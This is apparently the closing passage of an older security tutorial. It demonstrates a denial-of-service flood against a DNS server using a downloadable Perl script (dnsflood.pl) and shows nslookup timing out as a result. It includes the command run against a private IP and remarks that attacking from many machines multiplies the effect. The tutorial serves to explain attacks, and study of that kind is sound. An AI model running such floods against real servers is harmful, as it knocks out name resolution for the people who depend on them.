The script can be obtained from - hxxp://packetstormsecurity.org/DoS/dnsflood.pl

In the following example we use the scrip to create a DOS effect on the DNS server and then query the DNS for name resolution

perl dnsflood.pl 192.168.10.1
attacked: 192.168.10.1...

To assess the impact of this attack on performance the attacker from another machine first clears his local cache and then
queries the target name server. Clearing the local cache will ensure the resolver gets the information from the server and not locally.


C:\>ipconfig /flushdns
Windows IP Configuration
Successfully flushed the DNS Resolver Cache.

C:\>nslookup
DNS request timed out.
timeout was 2 seconds.
*** Can't find server name for address 192.168.10.1: Timed out
*** Default servers are not available
Default Server: UnKnown
Address: 192.168.10.1

> ms2.xyz.com
Server: UnKnown
Address: 192.168.10.1

DNS request timed out.
timeout was 2 seconds.
DNS request timed out.
timeout was 2 seconds.
*** Request to UnKnown timed-out

>exit

If this attack was multiplied from a number of machines then the impact would be even greater.


------------
CONCLUSION
------------

These are only a few possible exploits involving the DNS Spoofing vulnerability and there are,probably,
many more waiting to be discovered. Discovery and implementation is limited only by the active imagination of the attacker

Read more...